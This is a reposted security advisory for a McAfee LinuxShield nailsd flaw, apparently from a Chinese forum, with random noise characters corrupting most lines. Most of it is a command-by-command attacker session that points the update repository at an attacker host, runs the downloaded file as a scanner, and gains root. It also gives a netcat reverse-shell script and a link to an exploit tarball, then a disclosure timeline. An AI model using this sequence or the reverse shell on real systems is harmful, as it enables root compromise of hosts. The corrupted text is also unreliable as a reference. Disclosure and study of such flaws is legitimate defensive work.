    ; {& y+ ~. o# T3 C
    # Z" F7 s% e+ f) z; c- @, Z. }- o2 J1 b4 x; ~( j8 I
    $ q8 |) K: R) |
    Description:
    2 Z9 d: `) t3 U: T3 X============
    2 H/ \6 M$ b" d1 y+ L0 i* o! X/ x' l+ w& W7 W: X7 t6 D
    This vulnerability allows remote attackers to execute arbitrary code
    - z3 m3 k3 b- Q4 c3 F. Mon vulnerable installations of McAfee LinuxShield. User interaction
    , ]$ j3 ]. B7 s9 y+ Y1 I' q" zis not required to exploit this vulnerability but an attacker must
    ' l2 h- l+ w  C. l) ]be authenticated.
    $ w4 j) w# S3 v* K
    0 U% I3 U1 Z  h4 I$ VThe LinuxShield Webinterface communicates with the localy installed; N5 B" o2 a2 G8 R' W) f( N
    "nailsd" daemon, which listens on port 65443/tcp, to do( {2 u6 n5 i! ]( _8 R' O( I
    configuration. {7 y  U6 C% X* l6 `
    changes, query the configuration and execute tasks.3 P) e& [) Y) Y
    ; x: |" b, b( J0 p7 y2 e2 \
    Each user, which can login to the victim box, can also authenticate
    ) O: Q: p, g# ~0 @3 T: f2 p4 nit self to the "nailsd" and can do configuration changes and& F; r' b- [& d, |8 n
    execute& l3 ]+ @% V+ B6 \1 v- P
    tasks with root privileges.
    & U+ F* f8 S* b; u# C' [% n
    * T9 ?. ?; M; b0 Q3 kA direct execution of commands is not possible, but it is possible to
    , M  i. m. R& B6 f* L$ Ddownload and execute code through manipulation of the config and6 a$ n+ d: j' N7 S  _# D( p4 ~" k
    execute schedule tasks of the LinuxShield.
    8 l6 C$ F; V( P& t9 j5 @2 y. m$ w0 j$ J0 ]  K/ @
    # k9 V: L/ S4 O3 U& p5 k. j
    walk-through (after the TLS handshake):
    0 S3 K$ {$ `1 w+ B3 F2 c+--------------------------------------9 ~7 E, v( _4 Y  e0 L" h  G# s5 h) m

    9 Q; D( N% c  e9 M6 M, m1 z- wnailsd > +OK welcome to the NAILS Statistics Service
    $ h5 q3 T# [: H. ~$ \4 Kattacker> auth <user> <pass>9 }7 S6 E) F" M" m9 ~2 k5 N% P
    nailsd > +OK successful authentication( x& ~' S( `1 c/ W# h5 a

    3 Y' o' ~' M2 L- f6 {3 C# Set the Attacker repository to download our code from a httpd6 D0 b5 x1 \5 ^
    # (catalog.z), |  X9 P  K5 b, {( `# I
    #---------------------------------------------------------------
    $ _6 u. W/ O, Y+ k- p! X$ z  |attacker> db set 1 _table=repository status=1 siteList=<?xml version0 D5 Y+ G6 i# I) z
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    $ Z; H8 S6 Q% Q1 ?) gxmlns:ns="naSiteLi2 E' m* v! U  B- Z9 U7 |: h
    st" GlobalVersion="20030131003110"
    ! x5 w7 o8 H/ ^8 y' ?2 @4 yLocalVersion="20091209
    & p8 v, D  W- ^% d+ B161903" Type="Client"><SiteList; ~+ G6 z! T  i3 S
    Default="1" Name="SomeGU
      n1 p% i. w6 N. UID"><HttpSite Type="repository"
    ! Y; ]9 n# V2 j# F: v( uName="EvilRepo" Order="1- `% `3 T8 k4 w) y  r6 p: k
    " Server="<attackerhost>:80"' H+ U' _% a8 |% i4 [2 _$ [
    Enabled="1" Local="1"><Rela
    + R) ?: e' N2 B7 O" m3 C: ~
    ; G8 ]% `8 Y. {: {, [tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    & a  [/ M$ |5 Q0 c  t' Z. }; xrName></0 L. U" k. D. U- W3 O  A% s
    UserName><Password
    3 T. F5 a* }) [# R1 [. ?Encrypted="0"/></HttpSite></SiteList></
    ( t: Z4 y" @* nns:SiteLists> _cmd=update) d( x. j6 }& p% q5 e
    nailsd > +OK database changes buffered.7 _) K5 T; @) ?5 P- [$ g6 {0 L

    7 |0 O0 W1 S; t8 ^2 Z2 z# Execute task to set the attacker repository1 Z, D4 W# a% H
    #---------------------------------------------------------------/ @( h. v) q0 k; S' O
    attacker> task setsitelist
    5 Y! j( r6 ~% U' H4 N7 J& A7 z/ \! {nailsd > +OK setting sitelist from CMA.
    5 h7 K2 H0 E$ P6 }  A: K5 S7 X
    - o) ?1 M! K% I; W2 F# Q. ~$ ^# Execute the default Update task to download the code/ b+ e$ k/ ~2 }: i* S! |/ B9 D+ I
    #---------------------------------------------------------------' J1 c7 w( v" q5 m: k2 B1 Q" t
    attacker> task nstart LinuxShield Update* F+ F( }. \' D" H8 W7 ~* o1 E0 x3 }6 p
    nailsd > +OK task LinuxShield Update starting
    . o  [( b& a' s/ I
    ( x6 F% q6 I1 z# Create a Scan profile, which executes our code. The profiles are
    4 h  @* Z( n* I* Y( e# not stored in the database., X5 _0 i9 G' y/ L/ E$ t" T
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    6 Q3 C. M  k$ u. g6 `" H6 n#---------------------------------------------------------------
    ' O4 f. P2 H9 j, Kattacker> sconf ODS_99 begin/ e* `  t/ y: _' B9 X; Q" O) i
    nailsd > +OK 1260400888
    ; J9 l1 b, @* t, A$ _5 U( J8 x( E" @* e8 _5 V' a& ]
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the* N( H0 c( s7 A7 k6 x* G/ ~
    path
    3 ]0 ^* F/ E$ v/ n- ]0 q) @# where our earlier downloaded catalog.z file is stored.
    8 R4 P! M1 v2 T4 j& \* p# (/opt/McAfee/cma/scratch/update/catalog.z)6 ?: ]8 T* j3 e# t
    #---------------------------------------------------------------
    2 Y. a1 X- J& H+ y! q: Cattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    % `: b& R) G7 C- S. ztrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    1 \$ M+ j) ?% ?4 uDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=1 E. {0 m  T4 g8 O9 H
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng+ s' `+ h% q% J' T% ~
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro# o1 T/ A* J- [+ ?2 M7 |* T% o
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    : c* K/ U! E1 u5 n+ k1 `' Uir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en/ L& |% x5 _5 I% N
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd$ a& x* A/ g3 U% M
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    / S% H* T' o. W" w1 S) F- t  jristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru  K  j) V' a. ]
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    ) [6 c; @- J0 r) V* E6 h& K/ {) p.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    9 @/ I; k  U: [& `/ Zle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil7 U) T- l4 ?" @3 Z4 t. g( R
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin2 o  k& ]1 _7 L' Q
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr# S# u8 G9 c- w! d( M8 S; N' d
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm; ?% z4 E3 Z8 u, G) Q
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    + ]& E7 u" K; _1 D6 q7 _: W.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    ) y/ c9 V5 O; P7 m" P! D' vrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    1 e1 J5 M# x$ e# ~" ?ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=1004 f) N0 B5 {2 Z4 n
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ; s- |- S& I' S1 AODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil7 H* F) l5 g) u( k
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    & d$ n' x& k6 k  G9 w7 U* G4 N$ r1 ?nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    4 E& G, x- B) E; M7 Hofile.ODS_99.filter.extensions.type=extension nailsd.profil
    % G1 F; F1 r9 p8 g8 ^) ne.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99: Q' V& q9 r1 R
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    2 [0 _: r" T9 ~8 H$ }2 faction.App.primary=Clean nailsd.profile.ODS_99.action.App.s9 y1 x4 U3 V; \4 M% ]
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa3 [( V3 w; R  ]& @/ K% w! |5 T# e4 j
    ss nailsd.profile.ODS_99.action.error=Block
    5 [# _  v6 l. c! Q) E( ?/ dnailsd > +OK configuration changes buffered
    & M" X  u$ v, J4 i- r" ]# d) O4 jattacker> sconf ODS_99 commit 1260400888
    $ c" F. Q4 g: ?7 ^3 Ynailsd > +OK configuration changes stored
    . q4 r2 F+ n4 N) Y$ H& y
    ' }$ j* B. P" t% U# Set a scan task with the manipulated profile to execute the code
    ; c6 {, v8 W6 w1 x/ ^) H#---------------------------------------------------------------
    , n2 }9 K; X6 U( T/ `% rattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy' @* ~+ m4 P5 j6 C9 B
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    " F1 f! n4 d/ d+ U( emp;exclude:false timetable=type=unscheduled taskResults=0 i
    ) C) |8 B* q$ @_lastRun=1260318482 status=Stopped _cmd=insert0 D+ M' Q$ p( o# f1 J, k
    nailsd > +OK database changes buffered
    - _' u+ X) k! H! \, g! T5 B  q/ ^" N) W
    # Execute scan task to execute the code& H2 b  \8 }: h
    #---------------------------------------------------------------4 s, i1 M8 a: D% q# b/ _" U3 i
    attacker> task nstart Evil Task, }8 Z0 c* F' |
    4 z- J& k: ^( M( A. V
    +-------------------------------------- walk-through EOF/ ?6 N" F' l6 G3 e/ _' }
    3 G: ~) H9 B3 i6 S3 e' {. t
    0 B. q2 H# I. i! b, X; j
    To get a reverse root shell place something like this in the catalog.z4 Q& N9 X) @- Z( s8 E  O

    - u3 S5 [7 H# O9 X" D--- snip ---
    ( \, ^$ _: a' a  g- ~#!/bin/sh
    9 @0 a0 U  t- M2 Q9 Z1 Fnc -nv <attacker_host> 4444 -e /bin/sh. z4 u/ }. g8 k' J
    --- /snip ---
    4 [9 `2 b$ o# L  w# c2 w8 e( S" p# Y% H! ^5 q6 Q; ~. O
    4 ?. J: {9 L+ W) ?% Y$ a
    4 ]; V' ]0 K& ^- V2 K
    Proof of Concept :
    8 o) u& _* ]2 Z==================; _5 h5 P* F: z5 X" D) Z6 U0 Z

    ; [- h1 A# H1 R$ B2 e6 Zhttp://inj3ct0r.com/sploits/11165.tar.gz
    ( `! k1 ^/ d+ @. ]* g, ]. `# t- C1 r& N, k4 ?# z6 p) U* k  @
    & M0 Q1 a- z; T. i$ t3 [; l
    1 C3 ]1 [' Y9 ]8 q, X* a  ]) q$ {
    Solution:
    / p! b2 D+ J8 n2 V/ U=========) q9 V4 t. p1 k, Y6 S

    ! X: l9 N$ }# t1 i; X6 bMcAfee Advisory2 ?7 `( F9 d. J. f' f2 R9 D1 E' g
    +--------------' W3 }( @5 v# }- Q
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    # t- p- {' W7 q( G. A) ?; x
    $ |( }) o: U* y; g% A" `+ m: Z4 ?. v- R- Y- q& i# }

    8 V  p4 t9 M: s) y- J. n* ^+ I, \Disclosure Timeline (YYYY/MM/DD):  F& |  f5 O: D. S  [
    =================================
    # \" N9 @. @1 R0 L. u: C7 B; C9 I
      F# Y" ^) g0 I2009.12.07: Vulnerability found
    ; u; U0 V; @2 m$ o6 |2010.02.03: Asked vendor for a PGP key
    ( q3 z9 n" N. ?( g2010.02.05: Vendor sent his PGP key
    4 j( N4 l$ I: w" D2 p# k2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure2 Y+ ]! d$ P9 Q' Q6 u$ ^
    date (2010.02.18) to Vendor4 y' ]7 b, P* z( r
    2010.02.05: Vendor acknowledges the reception of the advisory
    9 m; O4 i6 b- {: H: {2010.02.16: Ask for a status update, because the planned release date is
    1 E5 C! L. z3 E. g# M! B2010.02.18.3 t6 _2 t/ o: n: B0 P
    2010.02.16: Vendor response that, they are currently working on a patch
    ) t+ d& J* l( x/ t" o2010.02.17: Changed release date to 2010.02.25.
    5 q5 j" B) |* I: {. H2010.02.22: Vendor gives a status update, that they are able to release
    ) b2 |, a' k  R- qthe patch on 2010.02.25.) ]/ C2 a. Z5 R( F' p/ K* i
    2010.02.24: Ask for a list of affected products and the advisory url.
    0 H2 W+ w  f( P; M7 Z: F4 I& v( ]2010.02.24: Vendor sends the list.% K* P# D. O5 A( d! \6 @2 N
    2010.03.02: Release of this Advisory
    5 O  @" G% w# z
    7 o3 e% c$ Q$ e* |3 l# G0 k4 o; E& Q  I; p" F, j) n

    " @. a' [# V$ t# r  A2 ?) m. t. |' U
    $ H: A1 Y- H9 E" S+ I% }
    4 x( f" H5 l$ H7 D* I% g  {
    ) l& o3 e. f$ v+ C- ]

    ( z& E& T& d8 X- Y
    0 z7 L  k- ^5 {8 B' B3 o6 }
    7 T* I# P0 j# J( n5 T) c8 q; c$ M7 e% Z/ b& h7 P

    ) A" E9 u7 b1 M8 K1 D2 D6 M! x* W: ~7 Z4 x  l* T/ c5 O

    . n8 o$ Y2 T& y9 O) P/ y
    0 R( y, o4 y. i# `7 f2 j" ~4 \0 m! D5 O7 O$ m$ W# F; M, f
    # c" {( Y* O7 e3 P
      X6 l; \4 ^% h- K: |7 {6 e7 F
    / Z) _- t8 |3 c2 ]$ k, _

    ! _- s3 e$ a6 @" K
    6 L/ O4 Q  ~) k" g& g, V. S公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表